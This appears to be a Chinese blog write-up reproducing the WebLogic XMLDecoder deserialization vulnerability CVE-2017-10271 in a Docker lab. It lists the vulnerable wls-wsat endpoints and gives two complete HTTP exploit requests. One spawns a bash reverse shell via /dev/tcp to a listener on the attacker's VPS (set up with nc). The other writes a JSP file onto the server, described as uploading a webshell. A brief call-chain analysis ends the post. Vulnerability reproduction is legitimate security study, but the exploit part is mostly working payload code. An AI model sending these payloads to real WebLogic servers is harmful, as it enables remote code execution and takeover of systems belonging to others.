Weblogic-CVE-2017-10271漏洞复现
漏洞描述:
WebLogic XMLDecoder反序列化漏洞。大体是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限
受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。
1、什么是WebLogic
WebLogic是Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式的WEB应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和JavaEnterorise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
2、XML数据是什么
XML:
可扩展标记语言,用来传输和存储数据
XMLDecoder:
XMLDecoder用于将XMLEncoder创建的xml文档内容反序列化为一个Java对象,其位于java.beans包下。
XMLEncoder:
XMLEncoder 类是 ObjectOutputStream 的互补替换,可用于生成 JavaBean 的文本表示形式,所使用方式与用 ObjectOutputStream 创建 Serializable 对象的二进制表示形式的方式相同。
漏洞复现:
通过docker启动靶场,访问7001端口如下图说明靶场启动成功:
1、漏洞点探测
先拼接以下路径访问:
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
出现以下截图的,可能存在漏洞
2、构造恶意xml
利用服务器的XMLDecoder可以解析XML数据这一特性,可以构造XML语句,上传一句话木马,getshell。
①反弹shell
首先在自己vps上开启监听端口8888
命令: nc -lvn 8888
注:其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误。POC如下:
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: your-ip:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 633 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& /dev/tcp/10.0.0.1/8888 0>&1</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
抓包修改之后放包。网页页面回显如下图:
然后在自己的VPS上查看是否已经成功得到bash环境。如下图:
成功获得shell环境
②文件上传
把页面刷新一下抓到包替换下列数据包。
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: your-ip:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 638 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java><java version="1.4.0" class="java.beans.XMLDecoder"> <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/Zyon.jsp</string> <void method="println"><string> <![CDATA[ <% out.print("Zyon Test Success"); %> ]]> </string> </void> <void method="close"/> </object></java></java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
然后访问: http://your-ip:7001/bea_wls_internal/Zyon.jsp
漏洞分析:
漏洞触发位置:wls-wsat.war。
漏洞触发url:/wls-wsat/CoordinatorPortType(POST)。
漏洞本质:此次漏洞出现在wls-wsat.war中,此组件使用了weblogic自带的webservices处理程序来处理SOAP请求。然后在 weblogic.wsee.jaxws.workcontext.WorkContextServerTube 类中获取XML数据传递给XMLDecoder来解析。 解析XML的调用链为 :
weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest
weblogic.wsee.jaxws.workcontext.WorkContextTube.readHeaderOld
weblogic.wsee.workarea.WorkContextXmlInputAdapter
浙公网安备 33010602011771号